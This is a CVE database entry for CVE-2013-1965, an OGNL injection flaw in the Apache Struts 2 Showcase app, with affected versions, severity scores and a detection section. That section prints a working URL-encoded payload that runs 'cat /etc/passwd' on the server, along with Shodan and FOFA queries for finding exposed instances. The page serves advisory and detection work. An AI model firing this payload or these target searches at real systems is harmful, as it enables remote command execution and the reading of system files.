cbcvebase.
CVE-2013-1965
published 2013-07-10

CVE-2013-1965: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted…

PriorityP276critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
93.81%
99.8th percentile
Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.

Affected

2 ranges
VendorProductVersion rangeFixed in
apachestruts>= 2.0.0 < 2.3.14.12.3.14.1
apachestruts2-showcase2.0.0 – 2.3.13

Detection & IOCsextracted from sources · hover to see the quote

url/user.action
commandname=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
  • Exploit targets POST requests to /user.action with a crafted OGNL payload in the 'name' parameter using URL-encoded %{...} expression syntax
  • Content-Type header is application/x-www-form-urlencoded for the exploit POST request
  • Successful exploitation returns HTTP 200 with /etc/passwd content matching root:.*:0:0: in the response body
  • Shodan queries to identify exposed Struts2 instances: http.html:"apache struts", http.title:"struts2 showcase", http.html:"struts problem report"
  • The second OGNL evaluation occurs when the redirect result reads the injected value from the stack and uses it as a redirect parameter, bypassing Struts and OGNL library protections
  • FOFA queries to identify exposed Struts2 instances: body="struts problem report", title="struts2 showcase", body="apache struts"
  • ·The vulnerability is specific to the Struts2 Showcase App (2.0.0–2.3.13); the exploit path /user.action is tied to the Showcase application and may differ in other deployments
  • ·Prior fixes for S2-003, S2-005, and S2-009 only partially closed the OGNL injection vector; this CVE exploits the redirect result evaluation path which those fixes did not address

CVSS provenance

nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.